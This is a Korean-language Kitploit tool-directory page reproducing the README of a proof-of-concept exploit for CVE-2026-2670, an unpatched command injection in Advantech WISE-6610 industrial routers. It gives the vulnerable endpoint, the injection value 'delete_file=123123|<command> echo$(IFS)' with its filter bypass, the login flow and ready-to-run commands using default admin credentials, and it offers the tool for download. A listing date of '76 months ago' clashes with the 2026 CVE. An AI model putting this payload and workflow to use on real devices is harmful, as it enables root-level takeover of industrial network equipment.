Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
exploit-CVE-2026-2670 — CVE-2026-2670에 대한 개념 증명 익스플로잇으로, Advantech WISE-6610 라우터의 명령 주입 취약점으로, 인증된 공격자가 루트 권한으로 임의의 명령을 실행할 수 있게 합니다. | Kitploit
도구/GitHubGitHub/ali-py3/exploit-cve-2026-2670
IoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubali-py3/exploit-cve-2026-2670

exploit-CVE-2026-2670

CVE-2026-2670에 대한 개념 증명 익스플로잇으로, Advantech WISE-6610 라우터의 명령 주입 취약점으로, 인증된 공격자가 루트 권한으로 임의의 명령을 실행할 수 있게 합니다.

저장소 보기
76개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

exploit-CVE-2026-2670

CVE-2026-2670 – Advantech WISE-6610 명령 주입 PoC

Advantech WISE-6610 산업용 셀룰러 라우터의 명령 주입 취약점을 입증하는 개념 증명 익스플로잇입니다.

이 취약점은 /cgi-bin/luci/admin/openvpn_apply 엔드포인트에 존재하며, 인증된 공격자가 임의의 시스템 명령을 실행할 수 있게 합니다.


📌 취약점 개요

WISE-6610 웹 인터페이스는 OpenVPN 구성 삭제를 처리할 때 delete_file 매개변수를 제대로 검증하지 않습니다.

유효한 자격 증명을 가진 공격자는 파이프(|) 뒤에 명령어와 종료용 echo$(IFS) 시퀀스를 사용하여 셸 명령을 주입하고 입력 필터링을 우회할 수 있습니다.

주입된 명령은 루트 권한으로 실행됩니다.

  • CVE ID: CVE-2026-2670
  • 공급업체: Advantech
  • 제품: WISE-6610
  • 수정 버전: PoC 공개 시점 기준 없음

⚙️ 요구 사항

  • Python 3.6+
  • requests 라이브러리

의존성 설치:

root@kitploit:~
pip install requests

🔧 옵션

옵션 설명

root@kitploit:~
--target	장치의 기본 URL (예: http://192.168.1.100:8444)
--cmd	실행할 명령어. 출력을 웹 루트 내 파일로 작성해야 함 (예: id > output.txt)
--output	출력 파일의 웹 경로 (예: /output.txt). --cmd에서 사용한 파일명과 일치해야 함
--cookie	(선택) 기존 sysauth 세션 쿠키 값
--username	(선택) 로그인용 사용자 이름
--password	(선택) 로그인용 비밀번호
--delay	출력을 검색하기 전 대기 시간(초) (기본값: 2)
--debug	상세 요청/응답 로깅 활성화

🚀 사용법

이 스크립트는 두 가지 인증 방식을 지원합니다:

기존 sysauth 세션 쿠키 제공

사용자 이름과 비밀번호로 로그인

기본 구문

root@kitploit:~
python3 exploit.py --target <URL> --cmd <COMMAND> --output <OUTPUT_PATH> \
[--cookie <SYSCOOKIE> | --username <USER> --password <PASS>] \
[--delay <SECONDS>] [--debug]

🧪 예시

1️⃣ 사전 인증된 쿠키 사용

root@kitploit:~
python3 exploit.py \
--target http://192.168.1.100:8444 \
--cmd 'id > output.txt' \
--cookie f417ce7d2d576017ff5fd81d7d5f555f \
--output /output.txt

2️⃣ 자격 증명으로 로그인

root@kitploit:~
python3 exploit.py \
--target http://192.168.1.100:8444 \
--cmd 'echo "pwned" > output.txt' \
--username admin \
--password admin \
--output /output.txt

3️⃣ 디버그 출력 사용

root@kitploit:~
python3 exploit.py \
--target http://192.168.1.100:8444 \
--cmd 'uname -a > output.txt' \
--username admin \
--password admin \
--output /output.txt \
--debug

🔍 작동 방식

1. Nonce 획득

root@kitploit:~
인증에 필요한 luci_nonce 쿠키를 얻기 위해 /cgi-bin/luci/로 GET 요청을 보냅니다.

2. 인증

root@kitploit:~
자격 증명이 제공된 경우, 스크립트는 sysauth 쿠키를 얻기 위해 luci_username 및 luci_password와 함께 /cgi-bin/luci/로 POST 요청을 보냅니다.

--cookie를 통해 유효한 쿠키가 제공되면 이 단계는 건너뜁니다.

3. 명령 주입

root@kitploit:~
다음 엔드포인트로 POST 요청을 보냅니다:

/cgi-bin/luci/admin/openvpn_apply

다음 매개변수와 함께:

act=delete
delete_file=123123|<command> echo$(IFS)
openvpn_id=1

echo$(IFS) 시퀀스는 주입된 명령을 종료하고 입력 필터를 우회하는 데 도움이 됩니다.

4. 출력 검색

root@kitploit:~
짧은 지연 후, 스크립트는 지정된 --output 경로에서 생성된 파일을 검색하려고 시도합니다.

⚠️ 면책 조항

이 도구는 교육 목적과 승인된 보안 테스트 전용으로 제공됩니다.

소유하지 않았거나 명시적 테스트 권한이 없는 시스템에 대한 무단 사용은 불법입니다.

저자는 이 소프트웨어로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.

도구 다운로드